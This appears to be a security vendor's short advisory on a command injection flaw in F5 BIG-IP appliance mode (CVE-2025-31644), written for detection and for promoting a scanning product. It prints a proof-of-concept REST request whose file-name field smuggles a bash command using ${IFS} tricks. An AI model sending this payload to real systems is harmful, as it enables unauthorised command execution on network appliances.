F5 BIG-IP Appliance Mode Command Injection (CVE-2025-31644)
- Dee Sehejpal BSc (HONS)
- May 23
- 1 min read
Application Details
BIG-IP is a collection of hardware platforms and software solutions which provide numerous services solely focused on security, reliability, and performance.
Vulnerability
A command injection vulnerability exists in an undisclosed iControl REST and BIG-IP TMOS Shell (tmsh), when Appliance mode is activated.
Identification
This command could potentially allow an authenticated attacker, with administrator role privileges, to execute arbitrary system commands. A successful exploit could allow the attacker to cross a security boundary.
POST /mgmt/tm/sys/config
{
"command":"save",
"options": [
{"file":"/var/tmp/`bash'${IFS}-c${IFS}'id'|'tee'${IFS}-
a${IFS}'mal_was_here`.scf", "passphrase":"aaaa"}
]
}Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary commands on the system.
Coverage
Idappcom have created signature 8025967 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
ความคิดเห็น